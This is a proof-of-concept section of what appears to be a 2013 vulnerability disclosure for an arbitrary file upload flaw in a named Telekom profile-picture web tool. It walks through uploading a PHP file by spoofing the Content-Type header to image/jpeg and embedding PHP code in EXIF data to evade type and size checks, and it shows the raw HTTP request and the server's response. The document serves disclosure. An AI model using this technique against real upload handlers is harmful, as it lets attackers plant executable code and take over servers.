Proof of Concept (PoC): ======================= The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account and without required user inter action. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below. a) The attacker should visit the main page http://profilbildtool.telekom.de/imagecropper.php?lang=en to create an image using the system b) In Choose network section: Twitter can be chosen as our network c) In Type of activity: 1) "Official use" radio button should be used 2) "Lead accounts" from the dropdown menu 3) The country should be chosen is "Austria AT" 4) in Select Logo: "T-Systems" should be used d) Types of background 1) Choose "Picture" for background 2) Browse and choose a specially crafted php or exe file. For example, we will use test.php 3) Press upload At this point we should intercept the request and change Content-Type: text/php to Content-Type: image/jpeg This will help us to bypass the type checking on the server Side The other constraint is the size of the file, We can change this by generating a specially crafted php file where the php code is in the EXIF section of the file. By this, the file will run as php correctly once its extension is php. Our request will be similiar to this ... POST /scripts/php/process.php HTTP/1.1 Host: profilbildtool.telekom.de User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://profilbildtool.telekom.de/uplFrame.php Cookie: PHPSESSID=rf4kuenldjmr24q77bv293q503; BIGipServerRD-10_po_UKS_Internet=rd10o00000000000000000000ffffac1c0a2fo8080 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------662283032583176423330776453 Content-Length: 10355 ----------------------------- 662283032583176423330776453 Content-Disposition: form-data; name="MAX_FILE_SIZE" 10000000 ----------------------------- 662283032583176423330776453 Content-Disposition: form-data; name="upImg"; filename="test.php" Content-Type: image/jpeg [The file content] It should has the header of an image to bypass the type checking also The response of this file request will be similiar to HTTP/1.1 200 OK Date: Mon, 30 Dec 2013 05:23:44 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Length: 65 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive The extension of the uploaded file depends on the extension in the name of our file. This gives us the ability to upload any file type we want to upload.